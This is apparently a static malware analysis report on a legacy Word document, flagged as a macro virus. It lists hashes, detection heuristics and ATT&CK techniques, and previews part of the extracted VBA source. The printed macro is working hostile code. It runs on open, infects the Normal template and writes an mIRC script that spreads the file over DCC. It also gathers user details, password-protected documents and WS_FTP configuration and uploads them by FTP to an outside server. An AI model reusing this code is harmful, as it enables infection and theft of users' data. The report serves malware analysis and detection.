Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cbe4470757c70e7f…

MALICIOUS

Office (OLE)

48.5 KB Created: 1999-03-28 19:59:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 0a42ca1debbad4c5a066c6f71ebcf60e SHA-1: c81159fb5c3f4f8cee60b705593f4ac32ca3d6f8 SHA-256: cbe4470757c70e7f4d7dfb6951497431fd05406c491653f618b2cc4ef1486a37
348 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

This document contains a malicious VBA macro that executes automatically upon opening, as indicated by the AutoOpen and Document_Open heuristic firings. The macro attempts to download and execute a second-stage payload, evidenced by the critical Shell() call heuristic and the detection of a known malware family (Doc.Trojan.Melissa-17). The script also searches for specific directories and files, suggesting a downloader or dropper functionality.

Heuristics 8

  • ClamAV: Doc.Trojan.Melissa-17 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Melissa-17
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 21984 bytes
SHA-256: c10fa7539adff27029c545c1935a97ed7c44e0a9b0a9fd9d2ae179358dc39f30
Detection
ClamAV: Doc.Trojan.Sin-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
FHUSKIXUBSB:  Options.SaveNormalPrompt = False
GMUPAVB:  Randomize Timer
SMPLUULM:  LordArz = "Technological Illusions"
OOOOOO = UUUUUU
CFUTJHUEDFO:  NormInstalled = False
WEXYEXFSEF:  ActInstalled = False
WWLEASRN:  Set ActCarrier = ActiveDocument.VBProject.VBComponents(1).CodeModule
P = II
FTHPOBOK:  Set NormCarrier = NormalTemplate.VBProject.VBComponents(1).CodeModule
MUAVFYVTLP:
FOUAVMSNNUA:  NI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(2, 1)
DKHRQWTMY:  AI = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(2, 1)
GBFSIOFIEK:
YIOYNCKGJRK:  If UCase(NI) = "ON ERROR RESUME NEXT" Then NormInstalled = True
VVGHWNDVNRP:  If UCase(AI) = "ON ERROR RESUME NEXT" Then ActInstalled = True
FLNGWGMF:
YGKRRUA:  If NormInstalled = False Then
CXLBDBWTKFR:      Set Infection = NormCarrier
MYXEQPOR:      Set Carrier = ActCarrier
MMM = WWW
RYOLEK:  Else
YFHSPSPGOJ:      Set Infection = ActCarrier
CDLDJGIYU:      Set Carrier = NormCarrier
KPUNGOUGIE:  End If
LBNVPIRNG:
ECBMAUO:
GNTIWQIGMVB:
TVVYFXCQFKS:  DoEvents
WWWWW = RRR
NESQKHFD:
OCVIRI:  Close
RJQONLUA:  Tr1 = Dir(CurDir & "\script.ini", vbNormal)
YAKWQOFDH:  Tr2 = UCase(Right(CurDir, 8))
PPPPPP = OOOOOO
DPMTMCQAYH:  Tr3 = Dir("C" & Chr(58) & "\MIRC", vbDirectory)
CKYPUICTVV:
DDDDDD = MMMMMM
TXRMBWKVVC:  If Tr1 <> "" Then SDir = CurDir & "\script.ini"
DMXARFM:  If Tr2 = "DOWNLOAD" Then SDir = CurDir & "\..\Script.ini"
KENUEHFST:  If Tr3 <> "" Then SDir = "C" & Chr(58) & "\MIRC\Script.ini"
GGIWCFLSD:
PARODYH:  If SDir <> "" Then
WUOMMQKHFL:      Open SDir For Output As #1
SVIHHCB:      Print #1, "n0=on 1" & Chr(59) & "JOIN" & Chr(59) & "#" & Chr(59) & "if ( $me != $nick ) { /dcc send $nick " & ThisDocument.FullName & " }"
AMKUMTXORTJ:      Close #1
SKNHHL:  End If
NJWTRAXB:  DoEvents
VAWAQJWDEJJ:
QCBODS:  WinPath = Environ("WINDIR")
JJ = VV
AHHCQOX:
KORWJNJKEG:  If Application.Tasks.Exists("Sockets Window") = True And System.PrivateProfileString("", "HKEY_CURRENT_USER\Software", "") = "" Then
YFHFSE:      With Application.FileSearch
CCCC = RRR
AJYKITXFW:              .FileName = "WS_FTP.ini"
OPXVWA:              .LookIn = "C" & Chr(58) & "\"
BWRIOEHGVJV:              .SearchSubFolders = True
SQRVFIKLGW:              .MatchTextExactly = True
ACHSWBVWEHJ:              .FileType = msoFileTypeAllFiles
QDNMXADLHKM:              .Execute
QNKFPOYU:              WsPath = .FoundFiles(1)
QQKGGS:      End With
AMSFWLF:
QHXFRK:      DoEvents
QBXXVQV:
RPMUYO:      If ActiveDocument.HasPassword = True Then BCK = True
GKYFAL:
MPDAGG:      DoEvents
LPFAVEMQW:      Open WinPath & "\" & Application.UserName & ".dat" For Output As #10
JWILUVRD:      Print #10, Application.UserName
K = PP
DVEWYTD:      Print #10, Application.UserAddress
ICPAJP:      If BCK = True Then Print #10, ActiveDocument.FullName
HCKNQVQNT:      If WsPath <> "" Then Print #10, "WS_FTP"
XUSNYTXYPFR:      Close #10
PPPPPP = PPPPP
UGOCOVFE:      Open WinPath & "\Command.$$$" For Output As #8
VMHQLBVRQ:      Print #8, "o ftp.xoom.com"
CDGXMEQ:      Print #8, "User SingOfScream"
MMQUKVSIXHQ:      Print #8, "Pass DIG001"
CDCDTGSSV:      Print #8, "binary"
BBB = XXXXXX
CTKKXEVQSGC:      Print #8, "put " & Application.UserName & ".dat"
XFUYWRR:      If WsPath <> "" Then Print #8, "put " & WsPath
XEWXWR:      If BCK = True Then Print #8, "put " & ActiveDocument.FullName
BCTVRVNMG:          Print #8, "quit"
WCVRDJBGJJ:      Close
FUGILSRSHF:      Shell WinPath & "\FTP.exe -n -s:Command.$$$"
KUCANVEQ:      MsgBox "file sent"
JCXAAM:      System.PrivateProfileString("", "HKEY_CURRENT_USER\Software", "") = "Your PC is infected  (UP THE IRONS)"
JBYUHEAUF:  End If
J = C
EXYILKMVPUB:  For x = 1 To ThisDocument.Variables.Count
AXQQAD:  
... (truncated)